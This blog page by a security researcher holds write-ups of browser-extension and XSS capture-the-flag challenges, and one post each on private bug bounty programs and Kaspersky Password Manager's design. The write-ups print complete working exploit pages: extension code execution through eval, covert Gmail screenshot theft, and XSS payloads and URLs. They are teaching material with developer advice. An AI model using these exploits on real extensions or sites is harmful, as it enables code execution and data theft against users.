Posted on by Wladimir Palant

My so far last BugBountyNotes challenge is called Can you get the flag from this browser extension?. Unlike the previous one, this isn’t about exploiting logical errors but the more straightforward Remote Code Execution. The goal is running your code in the context of the extension’s background page in order to extract the flag variable stored there.

If you haven’t looked at this challenge yet, feel free to stop reading at this point and go try it out. Mind you, this one is hard and only two people managed to solve it so far. Note also that I won’t look at any answers submitted at this point any more. Of course, you can also participate in any of the ongoing challenges as well.

Still here? Ok, I’m going to explain this challenge then.

The obvious vulnerability

This browser extension is a minimalist password manager: it doesn’t bother storing passwords, only login names. And the vulnerability is of a very common type: when generating HTML code, this extension forgets to escape HTML entities in the logins:

      for (let login of logins)
        html += `<li><a href="#" data-value="${login}">${login}</a></li>`;

Since the website can fill out and submit a form programmatically, it can make this extension remember whichever login it wants. Making the extension store something like login<img src=x onerror=alert(1)> will result in JavaScript code executing whenever the user opens the website in future. Trouble is: the code executes in the context of the same website that injected this code in the first place, so nothing is gained by that.

Getting into the content script

What you’d really want is having your script run within the content script of the extension. There is an interesting fact: if you call eval() in a content script, code will be evaluated in the context of the content script rather than website context. This happens even if the extension’s content security policy forbids eval: content security policy only applies to extension pages, not to its content scripts. Why the browser vendors don’t tighten security here is beyond me.

And now comes something very non-obvious. The HTML code is being inserted using the following:

$container = $(html);
$login.parent().prepend($container);

One would think that jQuery uses innerHTML or its moral equivalent here but that’s not actually true. innerHTML won’t execute JavaScript code within <script> tags, so jQuery is being “helpful” and executing that code separately. Newer jQuery versions will add a <script> tag to the DOM temporarily but the versions before jQuery 2.1.2 will essentially call eval(). Bingo!

So your payload has to be something like login<script>alert(1)</script>, this way your code will run in the context of the content script.

Getting from the content script to the background page

The content script can only communicate with the background page via messaging. And the background page only supports two commands: getLogins and addLogin. Neither will allow you to extract the flag or inject code.

But the way the background page translates message types into handlers is remarkable:

window[message.type].apply(window, message.params)

If you look closely, you are not restricted by the handler functions defined in the background page, any global JavaScript function will do! And there is one particularly useful function called eval(). So your message has to look like this to extract the flag: {type: 'eval', params: ['console.log(FLAG)']}. There you go, you have code running in the background page that can extract the flag or do just about anything.

The complete solution

So here is my complete solution. As usually, this is only one way of doing it.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Safe Login Storage solution</title>
    <script>
      window.addEventListener("load", event =>
      {
        window.setTimeout(() =>
        {
          let container = document.getElementById("logins-container");
          if (!container || !container.querySelector("[data-value^='boom']"))
          {
            document.getElementById("username").value = "boom<script>chrome.runtime.sendMessage({type: 'eval', params: ['console.log(FLAG)']})<\/script>";
            document.getElementById("submit").click();
            window.location.reload();
          }
        }, 2000);
      });
    </script>
  </head>
  <body>
    <form action="javascript:void(0)" hidden>
      <input id="username">
      <input id="submit" type="submit">
    </form>
  </body>
</html>

Categories: Comment [0]

Posted on by Wladimir Palant

The big bug bounty platforms are structured like icebergs: the public bug bounty programs that you can see are only a tiny portion of everything that is going on there. As you earn your reputation on these platforms, they will be inviting you to private bug bounty programs. The catch: you generally aren’t allowed to discuss issues reported via private bug bounty programs. In fact, you are not even allowed to discuss the very existence of that bug bounty program.

I’ve been playing along for a while on Bugcrowd and Hackerone and submitted a number of vulnerability reports to private bug bounty programs. As a result, I became convinced that these private bug bounty programs are good for the bottom line of the bug bounty platforms, but otherwise their impact is harmful. I’ll try to explain here.

What is a bug bounty?

When you collect a bug bounty, that’s not because you work for a vendor. There is no written contract that states your rights and obligations. In its original form, you simply stumble upon a security vulnerability in a product and you decide to do the right thing: you inform the vendor. In turn, the vendor gives you the bug bounty as a token of their appreciation. It could be a monetary value but also some swag or an entry in the Hall of Fame.

Why pay you when the vendor has no obligation to do so? Primarily to keep you doing the right thing. Some vulnerabilities could be turned into money on the black market. Some could be used to steal data or extort the vendor. Everybody prefers people to earn their compensation in a legal way. Hence bug bounties.

What the bug bounty isn’t

There are so many bug bounty programs around today that many people made them their main source of income. While there are various reasons for that, one thing should not be forgotten: there is no law guaranteeing that you will be paid fairly. No contract means that your reward is completely dependent on the vendor. And it is hard to know in advance, sometimes the vendor will claim that they cannot reproduce, or downplay severity, or mark your report as a duplicate of a barely related report. In at least some cases there appears to be intent behind this behavior, the vendor trying to fit the bug bounty program into a certain budget regardless of the volume of the reports. So any security researcher trying to make a living from bug bounties has to calculate pessimistically, e.g. expecting that only one out of five reports will get a decent reward.

On the vendor’s side, there is a clear desire for the bug bounty program to replace penetration tests. Bugcrowd noticed this trend and is tooting their bug bounty programs as the “next gen pen test.” The trouble is, bug bounty hunters are only paid for bugs where they can demonstrate impact. They have no incentives to report minor issues, not only will the effort of demonstrating the issue be too high for the expected reward, it also reduces their rating on the bug bounty platform. They have no incentives to point out structural weaknesses, because these reports will be closed as “informational” without demonstrated impact. They often have no incentives to go for the more obscure parts of the product, these require more time to get familiar with but won’t necessarily result in critical bugs being discovered. In short, a “penetration test” performed by bug bounty hunters will be everything but thorough.

How are private bug bounties different for researchers?

If you feel that you are treated unfairly by the vendor, you have essentially two options. You can just accept it and vote with your feet: move on to another bug bounty program and learn how to recognize programs that are better avoided. The vendor won’t care as there will be plenty of others coming their way. Or you can make a fuzz about it. You could try to argue and probably escalate to the bug bounty platform vendor, but IMHO this rarely changes anything. Or you could publicly shame the vendor for their behavior and warn others.

The latter is made impossible by the conditions to participate in private bug bounty programs. Both Bugcrowd and Hackerone disallow you from talking about your experience with the program. Bug bounty hunters are always dependent on the good will of the vendor, but with private bug bounties it is considerably worse.

But it’s not only that. Usually, security researchers want recognition for their findings. Hackerone even has a process for disclosing vulnerability reports once the issue has been fixed. Public Bugcrowd programs also usually provision for coordinated disclosure. This gives the reporters the deserved recognition and allows everybody else to learn. But guess what: with private bug bounty programs, disclosure is always forbidden.

Why will people participate in private bug bounties at all? Main reason seems to be the reduced competition, finding unique issues is easier. In particular, when you join in the early days of a private bug bounty program, you have a good opportunity to generate cash with low hanging fruit.

Why do companies prefer private bug bounties?

If a bug bounty is about rewarding a random researcher who found a vulnerability in the product, how does a private bug bounty program make sense then? After all, it is like an exclusive club and unlikely to include the researcher in question. In fact, that researcher is unlikely to know about the bug bounty program, so they won’t have this incentive to do the right thing.

But the obvious answer is: the bug bounty platforms aren’t actually selling bug bounty management, they are selling penetration tests. They promise vendors to deliver high-quality reports from selected hackers instead of the usual noise that a public bug bounty program has to deal with. And that’s what many companies expect (but don’t receive) when they create a private bug bounty.

There is another explanation that seems to match many companies. These companies know perfectly well that they just aren’t ready for it yet. Sometimes they simply don’t have the necessary in-house expertise to write secure code, so even with they bug bounty program always pointing out the same mistakes they will keep repeating them. Or they won’t free up developers from feature work to tackle security issues, so every year they will fix five issues that seem particularly severe but leave all the others untouched. So they go for a private bug bounty program because doing the same thing in public would be disastrous for their PR. And they hope that this bug bounty program will somehow make their product more secure. Except it doesn’t.

On Hackerone I also see another mysterious category: private bug bounty programs with zero activity. So somebody went through the trouble of setting up a bug bounty program but failed to make it attractive to researchers. Either it offers no rewards, or it expects people to buy some hardware that they are unlikely to own already, or the description of the program is impossible to decipher. Just now I’ve been invited to a private bug bounty program where the company’s homepage was completely broken, and I still don’t really understand what they are doing. I suspect that these bug bounty programs are another example of features that somebody got a really nice bonus for but nobody cared putting any thought into.

Somebody told me that their company went with a private bug bounty because they work with selected researchers only. So it isn’t actually a bug bounty program but really a way to manage communication with that group. I hope that they still have some other way to engage with researchers outside that elite group, even if it doesn’t involve monetary rewards for reported vulnerabilities.

Conclusions

As a security researcher, I’ve collected plenty of bad experiences with private bug bounty programs, and I know that other people did as well. Let’s face it: the majority of private bug bounty programs shouldn’t have existed in the first place. They don’t really make the products in question more secure, and they increase frustration among security researchers. And while some people manage to benefit financially from these programs, others are bound to waste their time on them. The confidentiality clauses of these programs substantially weaken the position of the bug bounty hunters, which isn’t too strong to start with. These clauses are also an obstacle to learning on both sides, ideally security issues should always be publicized once fixed.

Now the ones who should do something to improve this situations are the bug bounty platforms. However, I realize that they have little incentive to change this situation and are in fact actively embracing it. So while one can ask for example for a way to comment on private bug bounty programs so that newcomers can learn from the experience that others made with this program, such control mechanisms are unlikely to materialize. Publishing anonymized reports from private bug bounty programs would also be nice and just as unlikely. I wonder whether the solution is to add such features via a browser extension and whether it would gain sufficient traction then.

But really, private bug bounty programs are usually a bad idea. Most companies doing that right now should either switch to a public bug bounty or just drop their bug bounty program altogether. Katie Moussouris is already very busy convincing companies to drop bug bounty programs they cannot make use of, please help her and join that effort.

Categories: Comment [0]

Posted on by Wladimir Palant

The time has come to reveal the answer to my next BugBountyNotes challenge called Try out my Screenshotter.PRO browser extension. This challenge is a browser extension supposedly written by a naive developer for the purpose of taking webpage screenshots. While the extension is functional, the developer discovered that some websites are able to take a peek into their Gmail account. How does that work?

If you haven’t looked at this challenge yet, feel free to stop reading at this point and go try it out. Mind you, this one is hard and only two people managed to solve it so far. Note also that I won’t look at any answers submitted at this point any more. Of course, you can also participate in any of the ongoing challenges as well.

Still here? Ok, I’m going to explain this challenge then.

Taking control of the extension UI

This challenge has been inspired by the vulnerabilities I discovered around the Firefox Screenshots feature. Firefox Screenshots is essentially a built-in browser extension in Firefox, and while it takes care to isolate its user interface in a frame protected by the same-origin policy, I discovered a race condition that allowed websites to change that frame into something they can access.

This race condition could not be reproduced in the challenge because the approach used works in Firefox only. So the challenge uses a different approach to protect its frame from unwanted access: it creates a frame pointing to https://example.com/ (the website cannot access it due to same-origin policy), then injects its user interface into this frame via a separate content script. And since a content script can only be injected into all frames of a tab, the content script uses the (random) frame name to distinguish the “correct” frame.

And here lies the issue of course. While the webpage cannot predict what the frame name will be, it can see the frame being injected and change the src attribute into something else. It can load a page from the same server, then it will be able to access the injected extension UI. A submission I received for this challenge solved this even more elegantly: by assigning window.name = frame.name it made sure that the extension UI was injected directly into their webpage!

Now the only issue is bringing up the extension UI. With Firefox Screenshots I had to rely on the user clicking “Take a screenshot.” The extension in the challenge allowed triggering its functionality via a hotkey however. And, like so often, it failed checking for event.isTrusted, so it would accept events generated by the webpage. Since the extension handles events synchronously, the following code is sufficient here:

window.dispatchEvent(new KeyboardEvent("keydown", {
  key: "S",
  ctrlKey: true,
  shiftKey: true
}));
let frame = document.getElementsByTagName("iframe")[0];
frame.src = "blank.html";

Recommendation for developers: Any content which you inject into websites should always be contained inside a frame that is part of your extension. This at least makes sure that the website cannot access the frame contents, but you still have to worry about clickjacking and spoofing attacks.

Also, if you ever attach event listeners to website content, always make sure that event.isTrusted is true, so it’s a real event rather than the website playing tricks on you.

What to screenshot?

Once the webpage can access the extension UI, clicking the “Screenshot to clipboard” button programmatically is trivial. Again Event.isTrusted is not being checked here. However, even though Firefox Screenshots only accepted trusted events, it didn’t help it much. At this point the webpage can make the button transparent and huge, so when the user clicks somewhere the button is always triggered.

The webpage can create a screenshot, but what’s the deal? With Firefox Screenshots I only realized it after creating the bug report, the big issue here is that the webpage can screenshot third-party pages. Just load some page in a frame and it will be part of the screenshot even though you normally cannot access its contents. Only trouble: really critical sites such as Gmail don’t allow being loaded in a frame these days.

Luckily, this challenge had to be compatible with Chrome. And while Firefox extensions can use tabs.captureTab method to capture a specific tab, there is nothing comparable for Chrome. The solution that the hypothetical extension author took was using tabs.captureVisibleTab method which works in any browser. Side-effect: the visible tab isn’t necessarily the tab where the screenshotting UI lives.

So the attacks starts by asking the user to click a button. When clicked, that button opens Gmail in a new tab. The original page stays in background and initiates screenshotting. When the screenshot is done it will contain Gmail, not the attacking website.

How to get the screenshot?

The last step is getting the screenshot which is being copied to clipboard. Here, a Firefox bug makes things a lot easier for attackers. Until very recently, the only way to copy something to clipboard was calling document.execCommand() on a text field. And Firefox doesn’t allow this action to be performed on the extension’s background page, so extensions will often resort to doing it in the context of web pages that they don’t control.

The most straight-forward solution is registering a copy event listener on the page, it will be triggered when the extension attempts to copy to the clipboard. That’s how I did it with Firefox Screenshots, and one of the submitted answers also uses this approach. But I actually forgot about it when I created my own solution for this challenge, so I used mutation observers to see when a text field is inserted into the page and read out its value (the actual screenshot URL):

let observer = new MutationObserver(mutationList =>
{
  for (let mutation of mutationList)
  {
    if (mutation.addedNodes && mutation.addedNodes[0].localName == "textarea")
      document.body.innerHTML = `<p>Here is what Gmail looks like for you:</p><img src="${mutation.addedNodes[0].value}">`;
  }
});
observer.observe(document.body, {childList: true});

I hope that the new Clipboard API finally makes things sane here, so it isn’t merely more elegant but also gets rid of this huge footgun. But I didn’t have any chance to play with it yet, this API only being available since Chrome 66 and Firefox 63. So the recommendation is still: make sure to run any clipboard operations in a context that you control. If the background page doesn’t work, use a tab or frame belonging to your extension.

The complete solution

That’s pretty much it, everything else is only about visuals and timing. The attacking website needs to hide the extension UI so that the user doesn’t suspect anything. It also has no way of knowing when Gmail finishes loading, so it has to wait some arbitrary time. Here is what I got altogether. It is one way to solve this challenge but certainly not the only one.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Screenshotter.PRO browser extension (solution)</title>
    <script>
      function runAttack()
      {
        let targetWnd = window.open("https://gmail.com/", "_blank");

        window.dispatchEvent(new KeyboardEvent("keydown", {
          key: "S",
          ctrlKey: true,
          shiftKey: true
        }));

        let frame = document.getElementsByTagName("iframe")[0];
        frame.src = "blank.html";
        frame.style.visibility = "hidden";
        frame.addEventListener("load", () =>
        {
          // Leave some time for gmail.com to load
          window.setTimeout(function()
          {
            frame.contentDocument.getElementById("do_screenshot").click();

            let observer = new MutationObserver(mutationList =>
            {
              for (let mutation of mutationList)
              {
                if (mutation.addedNodes && mutation.addedNodes[0].localName == "textarea")
                {
                  targetWnd.close();
                  document.body.innerHTML = `<p>Here is what Gmail looks like for you:</p><img src="${mutation.addedNodes[0].value}">`;
                }
              }
            });
            observer.observe(document.body, {childList: true});
          }, 2000);
        });
      }
    </script>
  </head>
  <body>
    <button onclick="runAttack();">Click here for a surprise!</button>
  </body>
</html>

Categories: Comment [0]

Posted on by Wladimir Palant

I looked at a number of password manager browser extensions already, and most of them have some obvious issues. Kaspersky Password Manager manages to stand out in the crowd however, the approach taken here is rather unique. You know how browser extensions are rather tough to exploit, with all that sandboxed JavaScript and restrictive default content security policy? Clearly, all that is meant for weaklings who don’t know how to write secure code, not the pros working at Kaspersky.

Kaspersky developers don’t like JavaScript, so they hand over control to their beloved C++ code as soon as possible. No stupid sandboxing, code is running with the privileges of the logged in user. No memory safety, dealing with buffer overflows is up to the developers. How they managed to do it? Browser extensions have that escape hatch called native messaging which allows connecting to an executable running on the user’s system. And that executable is what contains most of the logic in case of the Kaspersky Password Manager, with the browser extension being merely a dumb shell.

The extension uses website events to communicate with itself. As in: code running in the same scope (content script) uses events instead of direct calls. While seemingly pointless, this approach has a crucial advantage: it allows websites to mess with the communication and essentially make calls into the password manager’s executable. Because, if this communication channel weren’t open to websites, how could the developers possibly prove that they are capable of securing their application?

Now I’m pretty bad at reverse engineering binary code. But I managed to identify large chunks of custom-written code that can be triggered by websites more or less directly:

  • JSON parser
  • HTML parser
  • Neuronal network

While the JSON parser is required by the native messaging protocol, you are probably wondering what the other two chunks are doing in the executable. After all, the browser already has a perfectly capable HTML parser. But why rely on it? Analyzing page structure to recognize login forms would have been too easy in the browser. Instead, the browser extension serializes the page back to HTML (with some additional attributes, e.g. to point out whether a particular field is visible) and sends it to the executable. The executable parses it, makes the neuronal network analyze the result and tells the extension which fields need to be filled with what values.

Doesn’t sound like proper attack surface maximization because serialized HTML code will always be well-formed? No problem, the HTML parser has its limitations. For example, it doesn’t know XML processing instructions and will treat them like regular tags. And document.createProcessingInstruction("foo", "><script/src=x>") is serialized as <?foo ><script/src=x>?>, so now the HTML parser will be processing HTML code that is no longer well-formed.

This was your quick overview, hope you learned a thing or two about maximizing the attack surface. Of course, you should only do that if you are a real pro and aren’t afraid of hardening your application against attacks!

Categories: Comment [3]

Posted on by Wladimir Palant

BugBountyNotes is quickly becoming a great resource for security researches. Their challenges in particular are a fun way of learning ways to exploit vulnerable code. So a month ago I decided to contribute and created two challenges: A properly secured parameter (easy) and Exploiting a static page (medium). Unlike most other challenges, these don’t really have any hidden parts. Pretty much everything going on there is visible, yet exploiting the vulnerabilities still requires some thinking. So if you haven’t looked at these challenges, feel free to stop reading at this point and go try it out. You won’t be able to submit your answer any more, but as both are about exploiting XSS vulnerabilities you will know yourself when you are there. Of course, you can also participate in any of the ongoing challenges as well.

Still here? Ok, I’m going to explain these challenges then.

What’s up with that parameter?

We’ll start with the easier challenge first, dedicated to all the custom URL parsers that developers seem to be very fond of for some reason. The client-side code makes it very obvious that the “message” parameter is vulnerable. With the parameter value being passed to innerHTML, we would want to pass something like <img src=dummy onerror=alert("xss")> here (note that innerHTML won’t execute <script> tags).

But there is a catch of course. Supposedly, the owners of that page discovered the issue. But instead of putting resources into fixing it, they preferred a quick band-aid and configured a Web Application Firewall to stop attacks. That’s the PHP code emulating the firewall here:

if (preg_match('/[^\\w\\s-.,&=]/', urldecode($_SERVER['QUERY_STRING'])))
    exit("Invalid parameter value");

The allowed character set here is the bare minimum to allow the “functionality” to work, and I feel really sorry for anybody who tried to solve the challenge by attacking this “firewall.” The only way around this filter is to avoid going through it in the first place.

It might not be immediately obvious but the URL parser used by the challenge is flawed:

      function getParam(name)
      {
        var query = location.href.split("?")[1];
        if (!query)
          return null;

        var params = query.split("&");
        for (var i = 0; i < params.length; i++)
        {
          var parts = params[i].split("=");
          if (parts[0] == name)
            return decodeURIComponent(parts[1]);
        }
        return null;
      }

Do you see the issue? Yes, it assumes that anything following the question mark is the query string. What it forgets about is the fragment part of the URL, the one following the # symbol. Any parameters in the fragment will be parsed as well. This wouldn’t normally be a big deal, but the fragment isn’t sent to the server! This means that no server-side firewall can see it, so it cannot stop attacks coming from this direction.

So here are some URLs that will trigger the XSS vulnerability here:

  • https://www.bugbountytraining.com/challenges/challenge-10.php#?message=%3Cimg%20src%3Ddumm%20onerror%3Dalert(%22xss%22)%3E
  • https://www.bugbountytraining.com/challenges/challenge-10.php?message=#%3Cimg%20src%3Ddumm%20onerror%3Dalert(%22xss%22)%3E

Of course, answers submitted by BBN users contained quite a few more variations. But what really surprised me was just how many people managed to solve this challenge without understanding how their solution worked. It seems that they attacked the Web Application Firewall blindly and just assumed that the firewall treated the # character specially for some reason.

Let’s close with an advise for all developers out there: don’t write your own URL parser. Even though URL parsing appears simple, there are many fall traps. If you need to do it, use the URL object. If you need to parse query parameters, use the URLSearchParams object. Even in non-browser environments, there are always well-tested URL parsers already available.

The long route to exploiting a message handler

The other challenge has no server side whatsoever, it’s merely a static web page. And the issue with that page should also be fairly obvious: it listens to message events. When browsers added window.postMessage() API as a means of cross-domain communication, the idea was that any recipient would always check event.origin and reject unknown sources. But of course, many websites fail to validate the message sender at all or go for broken validation schemes. It is no different for this challenge.

Instead of validating the sender, this page validates the recipient: the recipient stated in the message has to match the page’s window name. Now the window name can be easily set by the attacker, e.g. by setting a name for the frame that this page is loaded into. The difficulty here is that the page will only consider certain recipients as “valid,” namely those where its own Buzhash variant results in 0x70617373 (or as a string: “pass”).

And that hash function is mean: no matter the input, the two bytes in the middle will always be NUL bytes! At least that’s the case as long as you constrain yourself to the ASCII character set. Once you start playing around with Unicode, the desired answer actually becomes possible. A bit of experimentation gives me "\x70\x61\u6161\0\0\0\0\u7373" as a valid recipient. But because NUL bytes in the <iframe name> attribute won’t work, I had to experiment a bit more to find a somewhat less obvious solution: "\x70\x10\x10\x10\x10\u6161\u6100\u7373". Some BBN users solved this issue more elegantly: while NUL bytes in attributes don’t work, using them when setting iframe.name property works just fine. One submission also used Microsoft Z3 theorem prover instead of mere experimentation to find a valid recipient.

Once we managed to get the page to accept our message, what can we do then? Not a lot, we can make the page create a custom event for us. But there are no matching event listeners! That is, until you realize that jQuery’s ajaxSuccess callback is actually a regular event handler. So we can trigger that callback.

But the callback merely sets element text, it doesn’t use innerHTML or its jQuery equivalent. So not vulnerable? No, setting text is unproblematic. But this code selecting the element is:

$(data.selector)

The jQuery constructor is typically called with a selector. However, it supports a large number of different calling conventions. In particular, it (and many other jQuery methods) can be called with HTML code as parameter. This can lead to very non-obvious security issues as I pointed out a few years ago. Here, passing some HTML code as “selector” will allow the attacker to run JavaScript code.

Here is my complete solution:

<script>
  window.onload = function()
  {
    var frame = document.getElementById("frame");
    frame.contentWindow.postMessage({
      type: "forward",
      event: "ajaxSuccess",
      selector: "<img src=x onerror=alert(document.domain)>",
      recipient: "\x70\x10\x10\x10\x10\u6161\u6100\u7373"
    }, "*");
  };
</script>
<iframe id="frame" src="https://www.bugbountytraining.com/challenges/challenge-8.html" name="&#x70;&#x10;&#x10;&#x10;&#x10;&#x6161;&#x6100;&#x7373;"></iframe>

This is only one way of demonstrating the issue of course, and some of the submissions from BBN users were more elegant than what I came up with myself.

Categories: Comment [0]